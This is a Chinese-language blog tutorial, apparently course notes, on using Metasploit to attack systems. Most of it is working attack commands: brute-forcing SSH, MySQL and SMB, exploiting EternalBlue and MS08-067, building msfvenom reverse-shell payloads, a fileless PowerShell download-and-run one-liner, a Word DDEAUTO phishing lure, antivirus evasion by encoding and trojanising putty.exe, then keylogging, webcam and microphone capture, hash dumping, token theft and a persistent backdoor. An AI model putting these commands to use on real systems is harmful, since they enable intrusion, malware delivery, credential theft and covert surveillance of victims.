主頁 >  其他 > 08.Metasploit使用

08.Metasploit使用

2020-10-30 23:26:34 其他

MSF
主要是用于漏洞利用的
也被稱作漏洞框架,模塊化的東西

01 MSF資訊收集模塊
02 MSF密碼破解模塊
03 MSF漏洞利用模塊
04 MSF各種PAYLOAD
05 MSF后滲透模塊

 

01 MSF資訊收集模塊
//自己使用的話大多是getshell之后用來去提權

專業術語:
滲透攻擊(exploit)
測驗者利用系統,程式,或服務的漏洞進行攻擊的一個程序,
攻擊載荷(payload)
攻擊者在目標系統上執行的一段攻擊代碼,該代碼具有返彈連接,創建用戶,執行其他系統命令的功能 shellcode
在目標機器上運行的一段機器指令,成功執行后會回傳一個shell
模塊(module)
是指Metasploit框架中所使用的一段軟體代碼組件,
監聽器(listener)
監聽器是metasploit中用來等待介入網路連接的組件,

MSF基礎知識:
運行msfconsole即可打開msf命令控制介面
打開后:
metasplpit v5.0.070 //版本很重要
1960 explopots攻擊模塊 1094 auxiliary輔助模塊 336 post 目標螢屏鍵盤流量
558 payloads 生成木馬 45 encoders 編碼加密 10 nops 填充空白代碼
7 evasion 躲避殺軟 //5.0之后才增加的模塊

運用方法:
help 命令的使用方法
show 模塊名 //查看不同模塊的詳細使用方法 show explopots

資訊收集;
①whois查詢:
msf > whois example.com
msf> whois 192.168.1.100
②http://searchdns.netcraft.com/在線收集服務器 IP資訊工具
③nslookup

nmap:
nmap -sS -A 192.168.194.138

高級掃描方式:
①msf> use auxiliary/scanner/ip/ipidseq #IPID序列掃描器,與 nmap的-sI -O選項類似
showoptions
set RHOSTS 192.168.1.0/24
set RPORT8080 setTHREADS 50
run


呼叫模塊的方法有兩種格式:
1.use 5 回車 // 直接呼叫模塊的序號
2.復制全部模塊的名稱
使用portscan模塊
search//搜索 portscan//掃描
1.search portscan //搜索下掃描模塊有哪些
里面包含了很多基于掃描的方法例如syn,tcp,xmas,http等
2.use 5 //呼叫tcp的方式去掃描
3.show options //查看需要設定該模塊的地方有哪些
4.set rhosts 192.168.194.138 //設定掃描的目標
5.show options //查看需要設定的模塊是否已經設定完成
6.setg threads 50 //給全域的模塊執行緒都設定為50
8.set ports 21-25,80,8001-8100,445,3306,3389,1433 //設定掃描的埠
9.run //直接回去掃
結果:3306 ,80.445

特定掃描
smb_version 模塊:
msf> use auxiliary/scanner/smb/smb_version //遍歷整個網路ip查看是否開啟該服務
showoptions set RHOSTS 192.168.1.111
run
db_hosts –c address,os_flavor

方法:
1.search smb_version //
2.use 0 //呼叫該模塊
3.show potions //查看需要設定該模塊的地方
4.setg rhosts 192.168.194.0/24 全域都掃描該目標
5.查看該主機有沒有開啟檔案共享服務
6.對掃描出的服務進行爆破


找mssql主機 //掃描該服務的sqlsever資料庫開啟狀態
msf> use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
setTHREADS 255
run

方法:
1.use auxiliary/scanner/mssql/mssql_ping
2.show options
3.run //查看設定好后直接run

SSH服務掃描: ssh一般是LINUX主機開放的
msf> use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
setTHREADS 50
run

方法:
1.search ssh_version
2.use 3 //呼叫該模塊
3.show options
4.查看好設定后
5.run



telnet服務掃描 遠程連接

msf> use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
setTHREADS 50
run

方法:
1.search telnet_version
2.use 1
3.show optons
4.run


servives.asc 啟用就行

 

FTP 主機掃描
msf> use auxiliary/scanner/ftp/ftp_version
showoptions
set RHOSTS 192.168.1.0/24
setTHREADS 255
run

方法:search ftp_version
use 0

描 FTP 匿名登錄: // 有些內網的服務器為了員工上傳下載方便,會設定匿名權限
use auxiliary/scanner/ftp/anonymos
set RHOSTS 192.168.1.0/24
setTHREADS 50
run

掃描局域網內有哪些主機存活
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.1.0/24
setTHREADS 50
run


掃描網站目錄 //字典不是很大針對windows的,指定ip,指定80埠,否則報錯
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.1
setTHREADS 50
run

搜索網站中的E-mail地址 //kali必須能上外網


search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com
run


//做測驗針對服務器可能沒有漏洞,這時候就開始管理員釣魚,
釣魚:word,檔案,鏈接


嗅 探抓包

msf> use auxiliary/sniffer/psnuffle
run

//這個功能很強大,

 

RART2:MSF密碼破解模塊
攻擊服務的方法:
1.漏洞利用
2.賬號爆破
3.服務欺騙
4.服務釣魚工具
5.ddos

ssh服務口令猜測
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.80.134
set USERNAME root
set PASS_FILE /root/pass.txt set THREADS 50
run

//服務名稱后面加_login都是用來爆破的
01 search ssh_login
02 use 0
03 show options
04 setg threads 50 //執行緒要設定
05 vi pass.txt //設定字典
06.setg pass_file /root/pass.txt
07 set username root //爆toor賬號,如果設定了爆破限制會封ip只能換ip爆破
08 set rhosts 192.168.194.140
09 show options
10 run

爆破完以后會建立一個 session 1 opened會話
會話的作用: 可以控制目標端
11 sessions -l //查看目前有多少個會話
12 sessions -i 1 //指定序號為1 //打開該會話
13 ls 查看目標機器的檔案 //完成控制
14 ifconfig //查看目標機器ip
15 whoami //查看當前的權限
16 這個會話無法掛起,退出就失效了
17 ssh 192.168.194.140 yes 123123 //再去鏈接即可

root 無法使用外部ip去爆破,只能使用127.0.0.1 localhost,不過可以爆破其他賬號

mysql口令攻擊
search mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 192.168.80.130
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

postgresql攻擊
search postgresql
use auxiliary/scanner/postgres/postgres_login
show options set RHOSTS 192.168.80.130
set user_file /root/user.txt
set pass_fiel /root/pass.txt
exploit

tomcat 攻擊
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.1
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit

set rhosts 192.168.8.128
run
登錄成功之后就上傳一個wa包也就是jsp的封包

telnet 攻擊

use auxiliary/scanner/telnet/telnet_version
set 192.168.1.1
exploit

set pass_file /root/pass.txt
set username administrator
setg threads 50
run

samba攻擊

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.1 /192.168.1.0/24
set THREADS 200
exploit


如果爆出了 管理員賬號密碼,可他沒開telnet,rdp請問如何控制他

用psexec.exe \\192.168.8.128 -l administrator -p 123123
打開cmd.exe

smb爆破成功后會建立一個會話,
用Kali登錄會話的方法:
apt-get install telnet 下載telnet
Telnet 192.168.194.138
賬號 ,密碼


PART 3:MSF 漏洞利用模塊
大體漏洞分為以下幾個:

遠程代碼執行漏洞
IE瀏覽器漏洞
服務漏洞
本地提權漏洞

復現永恒之藍

search arp_ //呼叫該模塊
use 0 //呼叫該模塊
show options
set rhosts 192.168.8.0/24
setg threads 50
show options
run
//測下有多少個主機


1.search smb_version
2.use 0
3.set rhosts 192.168.8.0/24
//查看開了445的有幾個主機

重新打開視窗

4.nmap --script smb-vuln* 192.168.194.138
等待掃描
5.出現ms17-010

轉到smf視窗
6.search ms17-010
7.use 3 //呼叫永恒之藍漏洞
8.show options
9.set rhosts 192.168.194.138
show targets //查看能攻擊的版本
10.run 開始利用
11.隨便敲個回車//進入sytym權限
12.ipconfig //確定Ip
13.whoami //查看權限
14.net user 1 1 /add //創建新用戶
15.net user //查看賬號
16.net localgroup administrators 1 /add 添加到管理員組
17.net user 1 //查看是否添加成功
18.rdesktop 192.168.8.125 鏈接3389
19.如果無法登陸,就用3389強制登陸器

給XP設定攻擊載荷


1.nmap --script smb-vuln* 192.168.194.138
2.找到有ms08-067漏洞
3.search ms08-067
4.use 0
5.show options
6.set rhosts 192.168.194.138
7.show targets //查看有哪些攻擊型別
8.set target 34 //nmap掃除他的版本號對應
9.攻擊成功之后我讓他給我回傳一個攻擊載荷,而不是回傳cmd,讓他回傳后滲透攻擊模塊
10.set payload windows/meterpreter/reverse_tcp//設定payload
11.show options
12.set lhost 192.168.8.123 //設定回連的監聽地址
13.set lport 1122
14.show options
15.run
回傳meterpreter后
16.ps //查看目標的行程
17.migrate 672 //遷移系統行程,因為原來的行程不穩定
18.這個時候就會有兩個行程,如果系統行程沒有崩潰,我就能一直控制目標行程
19.help
20.run vnc // 實時監控管理員桌面在干哈
21.shell //直接呼叫cmd
22.exit //退出回傳meterpreter
23.background //掛起會話
24.sessions -l //查看會話
25.sessions -i 3 //呼叫會話

MS10-002 IE漏洞利用
//原理生成ie地址讓別人去訪問
use windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
show options
set SRVPORT 80
set URIPATH /
set LHOST 192.168.2.128
set LPORT 444
exploit

srvhost //設定自己的偵聽地址
srvport //設定本地偵聽的埠

1.use windows/browser/ms10_002_aurora
2.set srvhost 192.168.8.124
3.set payload windows/meterpreter/reverse_tcp //payload成功后還是植入回源代碼
4.show options
5.set lhost 192.138.8.124 //還是設定自己的偵聽位
6.set loprt 1123
7.run
8.復制地址發送給別人
9.netstat -tnlp //查看埠是否以偵聽
10.使用xp打開鏈接,建立會話
http://192.168.194.142:8080/0pH6FFcq


ps: 把msf放到vps里在偵聽本地埠的話這樣就能竊取別人機器了,ngrok也可以,前提是有漏洞,

MS12-020-嚴重 遠程代碼執行漏洞//服務得開3389
藍屏

1.search ms12-020
//會出現兩條,1是檢測該目標是否存在漏洞 0就是攻擊的
2.use 0
3.show options
4.set rhosts 192.168.8.128 //目標地址
5.run

用處在于事先設定好的檔案時開機自動重啟的,但是目標不重啟,這時候你就讓他藍屏就會重啟,

cve 08-07利用

1.search 0708
2.use 3
3.show options
4.show targets//查看可攻擊目標
5.set rhosts 192.168.8.125//目標站
6.run

網上查資料

提權演示:
寫payload
1.msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.124 lport=1122 -f exe > 1.exe
2.關掉win10防火墻
3.脫出1.exe到win10
4.復制到win7 虛擬機
5.back 回傳上一步
建立偵聽
6.use exploit/multi/handler建立偵聽等待鏈接
7.set payload windows/meterpreter/reverse_tcp //用哪一個生成就用哪一個payload
8.show options
9.set lhost 192.168.8.124 設定偵聽地址
10.set lport 1122 設定偵聽埠
11.run //建立偵聽開始
12.win7 打開1.exe
13.會話建立成
提權1
14.getuid //查看權限
15 list_tokens -u 查看是否有高權限會話
16.background //掛起會話
17.search sugge //查看漏洞尋找一個能夠查看目標系統哪些補丁沒打
提權2
18.search ms16-032 //本地提權漏洞
19.use 0
20.show optinos
21.set session 8 // 設定剛才的會話
22.show targets //查看能攻擊的系統
23 set target 1 //設定攻擊的系統
24.run
25.提權中
如果提權失敗
26.search ms15-051
27.use 0
28.set session 8
29.run
失敗
30.win7和08是一個6.0內核
31.08.2013.2012使用8120提權
32.search 8120
33.use 0
34.show options
35.set session 8
36.run
直接建立meterpreter
38.getudi

namp --script vuln 192.168.8.128 //掃描漏洞
namp --script smb-vuln* //掃所有的smb漏洞
nessus //掃漏洞

掃出來以后用

msd
search ms17-010 去搜索漏洞編號
use 利用

msfvenom簡介
msfpayload用來生成
msfencode用來編碼
msfvenom是msfpayload和msfencode的結合體,于2015年6月8日取代了msfpayload和msfencode,在此之后,metasploit-framework下面的的msfpayload(荷載生成器),msfencoder(編碼器),msfcli(監聽介面)都不再被支持,

msfvenom所有引數
-p -payload <payload> 指定需要使用的payload(攻擊載荷),可以使用自定義payload,幾乎是支持全平臺的
-l -list [module_type]列出指定模塊的所有可用資源,模塊型別包括:payloads,encoders,nops,all
-n -nopsled <length>為payload預先指定一個NOP滑動長度
-f -format <format> 指定輸出格式(使用 -help-formats 來獲取msf支持輸出格式串列)
-e -encoder [encoder]指定需要使用的encoder(編碼器),指定需要使用的編碼,如果既沒用-e選項也沒用-b選項,則輸出raw payload
-a -arch <architecture>指定payload的目標架構,例如*89|*64|-86_64
-platform <platform> 指定payload的目標平臺
-s -space <length> 設定有效攻擊載荷的最大長度,就是檔案大小
-b -bad-chars <list>設定規避字符集,指定需要過濾的壞字符例如:不使用"\x0f"、"\x00"
-i -iterations <count> 指定payload的編碼次數
-c -add-code < path > 指定一個附加的win32 shellcode檔案
-x -template <path> 指定一個自定義的可執行檔案作為模板,并將payload嵌入其中
-k -keep 保護模板程式的動作,注入的payload作為一個新的行程運行
-payload-options 列舉payload的標準選項
-o -out <path>指定創建好的payload的存放位置
-v -var-name <name>指定一個自定義的變數,以確定輸出格式
-shellest 最小化生成payload
-h -help 查看幫助選項
-help-formats 查看msf支持的輸出格式串列

 

常用引數

比如想查看windows/meterpreter/reverse_tcp支持什么平臺、哪些選項,可以使用msfvenom -p windows/meterpreter/reverse_tcp --list-options

msfvenom --list payloads可查看所有payloads
msfvenom --list encoders可查看所有編碼器
評級最高的兩個encoder為cmd/powershell_base64和x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免殺中使用頻率最高的一個編碼器

類似可用msfvenom --list命令查看的還有payloads, encoders, nops, platforms, archs, encrypt, formats

1.msfvenom --list payloads //看一下所有payloads
2.windows/×64/meterpreter_bind_tcp
windows64位的作業系統使用,回傳到后滲透模塊里,直連,走tcp協議
bing //直接,我們鏈接他
reverse//他來鏈接我,我做好偵聽即可

encoders //編碼
msfvenom --list encoders //可以查看用來編碼的方式有哪些
excellent //用得比較多,多型編碼,假的代碼是隨機性的

nops ,platforms,archs,encrypt,formats

監聽引數(重點)

防止假session
在實戰中,經常會遇到假session或者剛連接就斷開的情況,這里補充一些監聽引數,防止假死與假session,
msf exploit(multi/handler) > set ExitOnSession false
//可以在接收到seesion后繼續監聽埠,保持偵聽,
防止session意外退出
msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0
//默認情況下,如果一個會話將在5分鐘(300秒)沒有任何活動,那么它會被殺死,為防止此情況可將此項修改為0
msf5 exploit(multi/handler) > set SessionExpirationTimeout 0
//默認情況下,一個星期(604800秒)后,會話將被強制關閉,修改為0可永久不會被關閉

handler后臺持續監聽(重點)
msf exploit(multi/handler) > exploit -j -z
使用exploit -j -z可在后臺持續監聽,-j為后臺任務,-z為持續監聽,使用Jobs命令查看和管理后臺任務,jobs -K可結束所有任務,
還有種比較快捷的建立監聽的方式,在msf下直接執行:
msf5 > handler -H 192.168.8.124 -P 1122 -p windows/meterpreter/reverse_tcp


payload的可持續化 //直接在生成payload的時候就直接行程遷移

一般來說使用msfvenom生成的payload會單獨開啟一個行程,這種行程很容易被發現和關閉,在后期想做持久化的時候只能再使用migrate進行,

其實在生成payload時可直接使用如下命令,生成的payload會直接注入到指定行程中,
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

生成的shell程式執行后會啟動兩個行程shell.exe和svchost.exe,關閉其中一個不會影響會話狀態, 在上面的生成payload引數中:
(1)PrependMigrate=true PrependMigrateProc=svchost.exe 使這個程式默認會遷移到svchost.exe行程,自己測驗的時候不建議到這個行程而是其他的持久行程,
(2)使用-p指定使用的攻擊載荷模塊,使用-e指定使用x86/shikata_ga_nai編碼器,使用-f選項告訴MSF編碼器輸出格式為exe,-o選項指定輸出的檔案名為payload.exe,保存在根目錄下,


1.生成后找到shell.exe
2.復制到win10
3.在復制到03
4.打開shell.exe
5.sessions -l
6.sessions -i 1
7.ps // 即使把行程結束,也不會干擾到會話的存在
8.只要遷移到指定的行程,會話會更加穩定一些,

各平臺payload生成

Linux //32位等于x86 64位等于64
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -a x86 --platform Linux -f elf > shell.elf

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
show options
set lhost 192.168.194.142
set lport 1123
run

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R > test.apk

 

生成腳本payload

內網會講

Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1 Netcat
nc正向連接
msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.8.124 LPORT=1122 -f exe> 1.exe
nc反向連接,監聽
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe> 1.exe


生成腳本payload

PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php //用php呼叫的會話被閹割,無法提權


ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

偵聽Handlers

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.8.124
set LPORT 1122
set ExitOnSession false exploit -j -z


Powershell 配合msf無檔案攻擊
//無檔案攻擊就是直接加載到記憶體里面運行
//也就是遠程加載記憶體腳本進行攻擊

//正常需要上傳的檔案會被溯源到,但無檔案就不會

//原理:kali生成ps腳本,放到能被訪問到的公網vps,給目標站發送指令到公網去加載ps檔案,一旦運行就會反彈給kali,kali只需要偵聽目標站
生成ps腳本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1121 -f psh-reflection >x.ps1
設定偵聽
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
Set lhost 192.168.3.107
Run

客戶端運行
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.1/x.ps1')


實戰:
1.msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.194.142 LPORT=1125 -f psh-reflection >x.ps1 //在kali先生成檔案

2. use exploit/multi/handler
3.set payload windows/x64/meterpreter/reverse_tcp //設定偵聽
4.show options
5.set lport 1125
6.run

放到vps里 ,假設物理機是vps是網站

7.把x.ps1放到vps根目錄下

在目標機里訪問物理機地址

8.10.0.0.8/x.ps1
9. powershell IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.8/x.ps1')

10.kali反彈回鏈接了
可以先getshell 或者釣魚讓目標主機來訪問vps的x.ps1

 

Powershell配合word偽裝木馬執行
新建word設定域,
DDEAUTO?C:\\windows\\system32\\cmd.exe?"/k?powershell?IEX?(New-Object?Net.WebClient).DownloadString('http://192.168.3.1/x.ps1')?"


1.win7里 打開:winword新建檔案
2.ctrl+f9 //寫入域代碼
3.DDEAUTO?C:\\windows\\system32\\cmd.exe?"/k?powershell?IEX?(New-Object?Net.WebClient).DownloadString('http://192.168.3.1/x.ps1')?"

4.偵聽埠
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 1125
run
5.win7打開word

 

msf使用宏釣魚

1.git clone https://github.com/bhdresh/CVE-2017-8759.git //下載檔案
2.python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.8.131/logo.txt //用py運行生成rtf的檔案,偵聽自己(公網)地址
3.會生成一個rtf檔案
4.msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1133 -f exe > /root/shell.exe //用msf生成一個payload
//把shell.exe放到CVE檔案夾里

進行捆綁相當于打開會話
5.python cve-2017-8759_toolkit.py -M exp -e http://192.168.8.124/shell.exe -l shell.exe //打開80埠如果 已經打開,關閉即可
/etc/init.d/apache2 stop //關閉80
建立偵聽

6.msfconsole
7. use exploit/multi/handler
8.set payload windows/x64/meterpreter/reverse_tcp //設定偵聽模塊
9.set lhost 192.168.194.142
10.set lport 1133
11.run

發送使用
12.將rtf檔案放進目標win7系統執行
一旦打開后就會加cve里的shell到win7本地去運行,一旦加載就會去建立反彈鏈接


使用ngrock穿透內網port

設定ngrock隧道
本機安裝客戶端
./sunny clientid id號

ngrock服務器,等于購買了公網的Ip和公網埠
例如公網ip264.165.256.664 1003

本地的kali打開ngrok監聽264.165.256.664 1003埠
再去訪問目標站ip,目標ip所接受到的ip是264.165.256.661
用途:生成payload 和提權時候用的

官網ngrock.cc

注冊,關注公眾號,進入

隧道管理---開通隧道
例如免費:
協議可選tcp
隧道名稱,自選
遠程埠 10003
127.0.0.1:10003
確定添加
確定開通

記住隧道id復制一下
下載客戶端
下載KAli64 位
安裝


./sunny clientid 粘貼id
等待鏈接online 就代表鏈接成功
該視窗要一直開啟不要關閉
生成時候就可以寫公網地址
該公網地址建議決議ip
msfvenom -p windows/meterpreter/reverse_tcp lhost=64.69.43.237 lport=10840 -f exe > a.exe
//一旦鏈接就反彈到64.69.43.237

偵聽

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 10840
run
把馬發送出去就完事了

不論是什么檔案是要同樂ngrok就可以


Msf5-Evasion模塊免殺

2019年1月,metasploit升級到了5.0,引入了一個新的模塊叫Evasion模塊,官方宣稱這個模塊可以創建反殺毒軟體的木馬,
evasion有以下幾個模塊,可以使用show evasion進行查看

過windows,defender防火墻的免殺模塊

使用use windows/windows_defender_exe進行生成payload
msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set LHOST 192.168.8.124
msf5 evasion(windows/windows_defender_exe) > set LPORT 1122
msf5 evasion(windows/windows_defender_exe) > run
設定偵聽
handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp


1.use windows/windows_defender_exe
2.show options
3.set filename ev.exe
4.set payload windows/meterpreter/reverse_tcp
5.set lhost 192.168.8.124
6.set lport 1177
7.run //查看生成目錄
8.cp 目錄 /root目錄下
9.handler -H 192.168.8.124 -P 1177 -p windows/meterpreter/reverse_tcp //設定偵聽
10.放進win10被殺了哈哈哈
查看最新免殺視頻可以去油管搜索 bypass av msf


捆綁免殺
生成payload 捆綁putty.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -x putty.exe -f exe -o payload3.exe

捆綁編碼免殺
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe

多重編碼免殺
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.8.124 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe

http://virustotal.com/ 驗證靜態免殺 bypass 可以先去驗證下


shellter免殺
shellcode代碼注入工具
https://www.shellterproject.com/download/
進入后下載即可,這是windows如果要kali得安裝一個win的環境

kali使用需要下載
apt-get install shellter

shellert執行 過殺軟
報錯就根據提示安裝執行程式即可

1.a // 打開后會提示手動還是自動
2.放入工具包中的putty.exe //輸入目標
/root/putty.exe
3.y //是的啟用模式
4.L
5.1 //呼叫TCP反彈鏈接
6.192.168.8.124 偵聽地址
7.1155 偵聽埠
8.把putty.exe放進帶有殺毒軟體的win7
9.set payload windows/meterpreter/reverse_tcp //kali建立偵聽
10.set lhost 192.168.8.124
11.set lport 1155
12.run


免殺msfpayload 生成py檔案
生產py檔案的payload
1.msfVENOM -p windows/x64/meterpreter/reverse_tcp LPORT=10003 LHOST=119.28.66.234 -e x86/shikata_ga_nai -i 17 -f py -o /root/121.py
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.194.142 LPORT=1155 -i 11 -f py -o mss.py

建立偵聽

2.把生成出來的py檔案記事本打開
3.打開msf-py-bypass.txt
4.復制頭加入py檔案
5.復制尾巴加入py檔案
6.保存
生成exe
7.把pyinstaller-2.0 (1).zip解壓到py27目錄下】
8.再把msf.py復制到 py27目錄下
9.打開windows powershell 打開cmd
10 python.exe pyinstaller-2.0\pyinstaller.py --console --onefile msf.py 回車
11.成功后有msf.exe


MSF后滲透模塊

控制會話反彈鏈接的框架
什么是Meterpreter
//并不是所有會話都能開此功能
需要:
1.看權限 //回傳的shell權限高的話都能用
2.看payload 所有的腳本協議
php/meterpreter/reverse_tcp 腳本
windows/meterpreter/reverse_tcp 執行程式
都能生成會話就得看平臺腳本權限以及屬性
php提權得有一定的執行能力以及權限基礎才可以
exe是主程式建立會話
區分方法:use incognito //exe可以,但php不行
例如:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.124 lport=1122 -f exe > aa.exe
aa.exe拖進win3
msfconsole

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show
set lhost 192.168.8.124
set lport 1122
run //偵聽上
win3打開后鏈接成功會話進入meterpreter模塊
后滲透正式開始

1.help//查看幫助命令 ,核心命令
background //掛起會話
sessions -l //查看會話
sessions -i 1 //呼叫會話
sessions -k 1 //洗掉會話
2.檔案系統管理命令
cat //查看檔案內容
cd //切換路徑
checksum 檢查檔案屬性
cp //復制
dir //查看目錄
download 下載
epid編輯
mkdir 創建目錄
mv 移動
pwd查看

3.網路代理的操作命令
4.系統命令
5.獲取用戶的命令
6.攝像頭命令
7.下載目標sam檔案,拿到本地破解


基本命令
行程遷移
run posy/windows/manage/migrate
關閉殺軟
run kilav //不一定殺的斯,有驅動保護
通過shell來關閉防火墻
netsh adcfirewall set allprpfiles state off //看系統執行命令
查看目標機所有流量
run packetrecorder -i 1
提取系統資訊
run scraper
ps查看行程
migrate 1774 切換行程
截屏 screenshot
獲取系統運行的平臺 sysinfo

檔案系統命令
可以先dir看看檔案,在pwd看看當前路徑,然后 cd c:\\進入系統盤,一定要雙斜杠
cat a.txt //查看內容
rm c:\\a.txt //洗掉內容
upload /root/aa.txt aaa.txt 上傳檔案
download c:\\boot.ini/root 下載檔案
edit c:/boot.ini // 編輯檔案
mkdir dier test //在受害者系統上創建目錄
rmdir //在受害者系統上洗掉目錄
dir 列出目標主機名和檔案件
mv 修改目標主機上的檔案名
search -d d:\\www -f web.config 如 search -d c:\\ -f*.doc
run vnc 查看桌面

run getgui -e 開啟目標主機遠程桌面 3389
重新開啟視窗 rdesktop 192.168.8.124 進入遠程桌面
sysinfo 命令為顯示遠程主機的系統資訊版本
execute -f notepad.exe 遠程開啟記事本
execute -h 顯示幫助資訊, -f為執行要運行的命令
如果希望隱藏后臺執行,加引數-H 如execute -H -f notepad.exe

攝像頭命令
record_mic 音頻錄制
webcam_chat 查看攝像頭介面
webcam_list 查看攝像頭串列
webcam_stream 攝像頭視頻獲取

埠轉發
如果目標在內網我們使用ngroks連接的就無法直接連接
只需要portfwd add -l 4444 -p 3389 -r 19.168.8.124 //埠轉發,本地監聽4444,把目標機的3389轉到本機4444
連接時候就 rdesktop -u 127.0.0.01:4444


鍵盤記錄
keyscan_start :開啟鍵盤記錄功能
keyscan_dump : 顯示捕捉到的鍵盤記錄資訊
keyscan_stop : 停止鍵盤記錄

add user username password -h ip 在遠程主機添加用戶
add group user "Domain Admins" username -h ip 將用戶添加管理員組


hash獲取

hashdump
看到用戶的hash 去最后一段去破解

盜取令牌
use incognito //先加載一下 用來盜取主機令牌身份
list_tokens -u 列出目標主機用戶的可用令牌
list_tokens -g 列出目標主機用戶組的可用令牌
impersonate_token "粘貼身份令牌"

持久控制服務器

前提條件服務器系統可以
run metsvc 安裝后門
msfconsole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 192.168.2.131
run

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/195968.html

標籤:其他

上一篇:GPS對時裝置(GPS對時系統)市場報價分析

下一篇:【翻譯】威脅捕捉成熟度模型

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

